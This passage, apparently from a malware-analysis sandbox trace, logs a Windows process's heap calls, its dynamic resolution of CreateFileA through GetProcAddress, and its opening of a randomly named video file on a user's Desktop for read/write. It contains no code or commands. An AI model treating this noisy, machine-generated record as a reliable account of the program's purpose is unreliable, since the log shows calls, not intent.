hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0030.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0030.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0030.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0030.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0030.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0030.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0030.310] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0030.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0030.310] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0030.310] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0030.310] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0030.310] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0030.310] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0030.310] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0030.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0030.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0030.310] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0030.310] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af558 [0030.310] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0030.310] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0030.310] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0030.310] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0030.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0030.310] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0030.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0030.310] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cb20 [0030.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0030.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0030.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0030.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0030.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0030.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0030.311] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0030.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0030.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0030.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0030.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0030.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0030.311] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0030.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0030.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0030.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0030.311] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0030.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0030.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0030.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0030.311] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0030.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0030.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0030.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0030.311] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0030.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0030.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0030.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0030.311] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0030.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0030.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0030.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0030.312] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0030.312] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0030.312] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0030.312] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0030.312] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0030.312] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0030.312] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0030.312] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0030.312] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0030.312] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0030.312] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0030.312] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0030.312] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0030.312] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0030.312] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0030.312] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0030.312] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0030.312] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0030.312] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0030.312] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0030.312] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0030.312] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0030.312] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0030.312] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0030.312] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0030.312] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0030.312] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0030.312] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0030.312] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0030.312] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0030.312] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0030.312] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0030.312] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0030.312] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0030.312] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0030.313] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0030.313] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0030.313] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0030.313] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0030.313] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0030.313] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0030.313] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0030.313] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0030.313] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0030.313] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0030.313] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0030.313] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0030.313] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0030.313] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0030.313] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0030.313] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0030.313] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0030.313] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0030.313] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0030.313] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0030.313] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0030.313] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0030.313] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0030.313] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0030.313] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0030.313] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0030.313] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0030.313] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0030.313] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0030.313] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0030.313] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0030.313] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0030.313] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0030.313] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0030.313] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0030.314] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0030.314] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0030.314] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0030.314] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0030.314] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0030.314] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0030.314] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0030.314] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0030.314] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0030.314] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0030.314] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0030.314] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0030.314] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0030.314] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0030.314] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0030.314] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0030.314] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0030.314] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0030.314] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0030.314] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0030.314] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0030.314] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0030.314] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0030.314] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0030.314] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0030.314] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0030.314] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0030.314] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0030.314] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0030.314] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0030.314] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0030.314] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0030.314] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0030.315] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0030.315] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0030.315] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0030.315] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0030.315] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0030.315] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0030.315] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0030.315] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0030.315] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0030.315] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0030.315] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0030.315] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0030.315] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0030.315] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0030.315] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0030.315] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0030.315] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0030.315] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0030.315] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0030.315] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0030.315] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0030.315] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0030.315] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0030.315] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0030.315] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0030.315] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0030.315] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0030.315] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0030.315] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0030.315] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x88cce8 [0030.316] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x88cce8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0030.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0030.316] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0030.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0030.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0030.316] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0030.316] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0030.316] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0030.316] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0030.316] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0030.316] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cce8 [0030.316] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x88cce8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0030.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0030.316] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0030.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0030.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0030.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0030.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0030.316] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0030.316] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0030.316] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0030.316] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0030.316] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0030.316] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0030.316] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0030.316] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0030.316] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0x88ffb0 [0030.316] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pRtMXaA65Jvr0xt.mkv", cchWideChar=58, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 58 [0030.316] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x3a) returned 0x7ab260 [0030.317] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pRtMXaA65Jvr0xt.mkv", cchWideChar=58, lpMultiByteStr=0x7ab260, cbMultiByte=58, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pRtMXaA65Jvr0xt.mkv", lpUsedDefaultChar=0x0) returned 58 [0030.317] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0030.317] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0030.317] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0030.317] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0030.317] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0030.317] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0030.317] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0030.317] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0030.317] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0030.317] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pRtMXaA65Jvr0xt.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\prtmxaa65jvr0xt.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0030.317] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0030.317] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b85a8 [0030.317] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0030.317] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0030.317] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0030.317] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0030.317] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0030.317] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0030.317] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0030.317] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0030.317] RtlAllocateHeap 